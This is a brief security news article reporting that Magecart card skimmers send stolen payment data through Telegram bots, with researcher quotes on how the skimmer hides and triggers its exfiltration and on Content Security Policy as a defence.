Security researchers noticed a new twist in tactics used by cybercriminals affiliated with Magecart operations - cyber attacks aimed at stealing credit-card data from online shoppers. Hackers are now using encrypted messaging service Telegram as a means for sending stolen credit-card information back to their command-and-control (C2) servers.
As the researcher noted, while this method is effective in terms of data exfiltration, it is not a very reliable technique, seeing as anyone with the token for the Telegram bot can hijack the process.
“Telegram isn't setup to do this type of thing properly, you have to grant publicly accessible code too much power. And, like many other digital skimming/#magecart techniques, this can be preemptively defeated via a Content Security Policy,” the researcher said an a tweet.
According to Jérôme Segura of Malwarebytes, who has also analyzed the skimmer code, the skimmer’s author encoded the bot ID and channel, as well as the Telegram API request with simple Base64 encoding to hide them.
“The exfiltration is triggered only if the browser’s current URL contains a keyword indicative of a shopping site and when the user validates the purchase. At this point, the browser will send the payment details to both the legitimate payment processor and the cybercriminals,” Segura explained.
This data exfiltration mechanism, the researcher noted, is efficient and doesn’t require cybercriminals to keep up infrastructure that could be taken down or blocked by defenders.
“They can even receive a notification in real time for each new victim, helping them quickly monetize the stolen cards in underground markets,” he added.